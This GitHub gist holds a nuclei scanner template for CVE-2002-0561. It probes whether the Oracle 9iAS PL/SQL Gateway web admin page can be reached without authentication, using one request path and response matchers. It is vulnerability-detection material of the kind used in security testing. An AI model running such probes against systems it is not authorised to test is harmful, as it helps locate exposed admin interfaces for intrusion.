Skip to content

Instantly share code, notes, and snippets.

@ihebski
Created September 23, 2020 09:51
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save ihebski/00a5365077ceff7e58800cb49d391c04 to your computer and use it in GitHub Desktop.
Save ihebski/00a5365077ceff7e58800cb49d391c04 to your computer and use it in GitHub Desktop.
nuclei template for [CVE-2002-0561] Oracle 9iAS PL/SQL Gateway Web Admin Interface Null Authentication
id: CVE-2002-0561
info:
name: Oracle 9iAS PL/SQL Gateway Web Admin Interface Null Authentication
author: Segfolt
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}/pls/simpledad/admin_/gateway.htm?schema=sample"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- Gateway Configuration
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment